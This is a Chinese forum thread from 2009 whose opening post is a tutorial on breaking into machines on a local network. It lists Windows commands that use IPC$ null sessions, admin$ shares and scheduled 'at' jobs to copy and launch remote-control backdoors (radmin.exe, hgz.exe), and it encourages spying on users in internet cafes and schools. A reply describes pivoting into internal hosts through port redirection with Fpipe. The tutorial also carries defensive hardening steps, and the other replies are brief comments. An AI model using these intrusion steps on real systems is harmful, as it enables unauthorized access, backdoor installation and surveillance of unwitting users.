ubnt解决方案
查看: 11111|回复: 66

ceng成功后,3分钟入侵局域网机器!

[复制链接]

306

回帖

1054

积分

180 小时

在线时间

上尉

注册时间
2009-7-1
金币
683 个
威望
1 个
荣誉
0 个

尚未签到

发表于 2009-8-3 14:48 |显示全部楼层
本帖最后由 龍易凤 于 2009-8-3 15:14 编辑

ceng成功后,3分钟入侵局域网机器!

下载的朋友赶紧看下这些命令,会有帮助!

net use \\192.168.0.100\ipc$ "" /user:"administrator"
net time \\192.168.0.100
at \\192.168.0.100 20:53 C:\WINDOWS\system32\tlntsvr.exe
telnet 192.168.0.100
net share admin$
copy c:\radmin.exe \\192.168.0.100\admin$
copy c:\hgz.exe \\192.168.0.100\admin$
c:\windows\radmin.exe
c:\windows\hgz.exe  
而且在一般情况下,一些功能对管理员来说也是没有必要的。如果你不需要MS SQL Server 的xp_cmdshell(use sp_dropextendedproc "xp_cmdshell"这项功能就不要把xp_cmdshell extended stored proc(扩展存储过程)命令功能留着。
  我们只需要在isql窗口中输入:
use master
sp_dropextendedproc 'xp_cmdshell'
net share ipc$
net share admin$
net use 映射盘符: \\肉鸡IP\肉鸡盘符
譬如:
net use z: \\1.1.1.1\c    (把对方的c盘映射成你的z盘),
察看一下开了哪些端口,有445哦,
(主要是针对2000系统的)
netstat -an
命令:net view
(有的机器用的是win98的系统查不出的)
看一下自己的IP
再看看用户:
于是可以进行IPC$连接了(关于IPC$空连接的资料你可以上网搜索一下)
命令:net use \\220.160.199.38\ipc$ "" /user:Administrator
命令:net use \\ip\ipc$ 密码 /user:用户
net use \\220.160.199.38\ipc$ "" /user:"zyz"
显示命令成功
可以用这个命令看下是否成功:net use
好了,现在我们给他传个咚咚--我配置好的radmin
命令:copy 本地文件 远程目录
如:copy c:\4899.exe \\192.168.0.200\admin$
(这里的$是指admin用户的c:\winnt\system32\)
传过去了,我们当然要运行它啊,怎么运行呢?接着看
现在我们来看看他机器的时间
命令:net time \\192.168.0.200
然后用这个命令启动
at \\192.168.0.200 时间 要运行的文件
at \\IP 时间 要运行的文件
(这个是计划任务里边的一个命令)
好了,然后呢,嘿嘿----等!
看下我们的后门运行了没有?
呵呵,上线了
我回头看看是哪个MM or GG?
我们看看她在干什么?
嘿嘿~OK了吧!至于以后你要做什么,就看你了
这个方法还可以入侵网吧的主机,其实内网一般都有这个漏洞
特别象学校或网吧等地方
我试过了,不过,现在偶不搞他
好了,到这里了,防范方法在下边,88!

防范ipc$入侵:
1.禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)
2.禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3.永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4.安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师
5.设置复杂管理员密码,防止通过ipc$穷举密码

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册 微信登录

x

评分

1

查看全部评分

127

回帖

1185

积分

85 小时

在线时间

上尉

注册时间
2008-11-15
金币
1034 个
威望
1 个
荣誉
0 个

尚未签到

发表于 2009-8-3 15:02 |显示全部楼层
本帖最后由 yangzi0128 于 2009-8-3 15:05 编辑

haiyao ^^^^^^^
ceng成功后,3分钟入侵局域网机器!

局域网(local area network),简称LAN,是处于同一建筑、同一大学或者方圆几公里地域内的专用网络。局域网常被用于连接公司内办公室或工厂里的个人计算机和工作站,以便共享资源,节约费用。但是,很多人认为处在局域网内就可以高枕无忧,其实那是大错特错的。
    局域网多数是通过一个代理服务器或网关连上Internet的,所以,如果我们能够入侵那台服务器(或网关),我们就有可能入侵到它的内部网络。
    作为代理服务器(或网关)通常有两个或两个以上的IP地址。一个是Internet上的真实IP(如218.14.156.8),这个IP在Internet上是能够访问的,另一个是内部IP(如192。168.0.1),这个IP是虚拟的,在Internet上并不存在,我们不能直接访问。也就是说,局域网里的分机都会受到代理服务器或网关的保护。
    例如,有这样一个局域网服务器的IP为202.99.1.1,其内部有一些分机,内部分机的IP我们暂不知道(不过通常为192.168.0.x)。
    首先,假如我们已经取得202.99.1.1的Administrator的密码,通过IPCS打开Telnet服务并Telnet上202.99.1.1。执行ipconfig命令,得出其两块网卡的IP分别为192.168,0.1和202.99.1.1,那么其他的机器的IP应该就在192.168.0.X这个网段。在202.99.1.1上安装流光4.7的sensor(其实x-scan也可以,而且x-scan能够扫描的漏洞比流光多。不过操作起来就有点麻烦,你要先上传X-scan到主机,再telnet上去利用x-scan的命令行模式扫描,所以这个telnet终端不能断开,也就是说你要等到x—scan扫描完了才能断开telnet,否则就会中断扫描),主要是寻找内部网的漏洞。根据我的经验,内部网的机器的安全性极差!administrator的密码很弱智,多数为空或123、123456等!而且有许多分机的guest账号都是Administrators组的成员,总之就是漏洞重重!
    分析内部网络的漏洞后,就利用“端口重定向”来入侵。
    所谓端口转向功能,就是将对某个端口的请求转向到其他电脑上,假设某一分机的内部IP是192.168.0.2,经过流光的扫描知道Administrator的口令为123,并且开放Telnet和3389服务,主机的外部IP是202.99.1.1。在202.99.1.1上运行了一个端口转向的程序(Fpipe.exe),经过参数设置,这个程序先在202.99.1.1开,23端口并监听,当有请求连接时,创建一个socket,通过22端口把请求发送到192.168.0.2的23端口去.所以,当有人向主机202.99.1.1的23端口发送Telnet连接的请求时,端口转向程序就发生作用了,马上将这个请求转向到那台192.168.0.2分机上的23端口去,因为192.168.0.2开放Telnet服务,所以这台分机会马上作出回应,这样连接就会产生了,也就是说攻击者已经入侵到内网的分机。
    由此可以看出,只要我们的机器连上网,无论是直接上网,还是通过网关上网,都有被入侵的可能。因此,日常防范意识需要加强,防范工作
回复

使用道具 举报

127

回帖

1185

积分

85 小时

在线时间

上尉

注册时间
2008-11-15
金币
1034 个
威望
1 个
荣誉
0 个

尚未签到

发表于 2009-8-3 15:03 |显示全部楼层
本帖最后由 yangzi0128 于 2009-8-4 09:38 编辑

金币!!!
下载后就被卡巴干掉了
回复

使用道具 举报

76

回帖

224

积分

73 小时

在线时间

少尉

注册时间
2008-5-16
金币
132 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-8-3 15:04 |显示全部楼层
可以吗?看看
回复

使用道具 举报

5236

回帖

3万

积分

1943 小时

在线时间

超级版主

WiFi-M

鲁班小弟

注册时间
2008-12-9
金币
24954 个
威望
27 个
荣誉
14 个

尚未签到

发表于 2009-8-3 15:05 |显示全部楼层
看看!~
回复

使用道具 举报

306

回帖

1054

积分

180 小时

在线时间

上尉

注册时间
2009-7-1
金币
683 个
威望
1 个
荣誉
0 个

尚未签到

发表于 2009-8-3 15:12 |显示全部楼层
为了感谢顶我的朋友,放出些常用命令net use \\192.168.0.100\ipc$ "" /user:"administrator"
net time \\192.168.0.100
at \\192.168.0.100 20:53 C:\WINDOWS\system32\tlntsvr.exe
telnet 192.168.0.100
net share admin$
copy c:\radmin.exe \\192.168.0.100\admin$
copy c:\hgz.exe \\192.168.0.100\admin$
c:\windows\radmin.exe
c:\windows\hgz.exe 
回复

使用道具 举报

18

回帖

44

积分

12 小时

在线时间

新兵上阵

注册时间
2009-8-3
金币
25 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-8-3 15:12 |显示全部楼层
看一看,学习学习
回复

使用道具 举报

251

回帖

417

积分

202 小时

在线时间

少尉

注册时间
2008-11-8
金币
98 个
威望
3 个
荣誉
1 个

尚未签到

发表于 2009-8-3 15:15 |显示全部楼层
小榕在n年前提出的经典 ipc入侵 模式。。现在只有一些不怎么打补丁 的机器 能用了。。哎,,让我想起了当年。。背这些命令的时光。。。。

没多大意思 。概率 很低。。
80 字节以内
不支持自定义 Discuz! 代码
回复

使用道具 举报

564

回帖

1110

积分

133 小时

在线时间

上尉

注册时间
2009-2-24
金币
529 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-8-4 11:03 |显示全部楼层
不错,学习中。。。。。。。。。。。。。。
回复

使用道具 举报

46

回帖

110

积分

13 小时

在线时间

上等兵

注册时间
2008-6-9
金币
59 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-8-4 11:56 |显示全部楼层
这种东西也要收2金币啊?  骗新手呢!!!!
回复

使用道具 举报

170

回帖

1171

积分

142 小时

在线时间

上尉

注册时间
2009-3-7
金币
974 个
威望
0 个
荣誉
0 个
累计签到:1 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2009-8-4 12:09 |显示全部楼层
对我好像没有用,可以上网就OK了。入侵人家网络干什么?
回复

使用道具 举报

20

回帖

32

积分

15 小时

在线时间

新兵上阵

注册时间
2009-6-8
金币
10 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-8-4 12:31 |显示全部楼层
还要钱哪,俺没有钱呀
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

站点统计 | Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2024-9-22 04:23

返回顶部 返回列表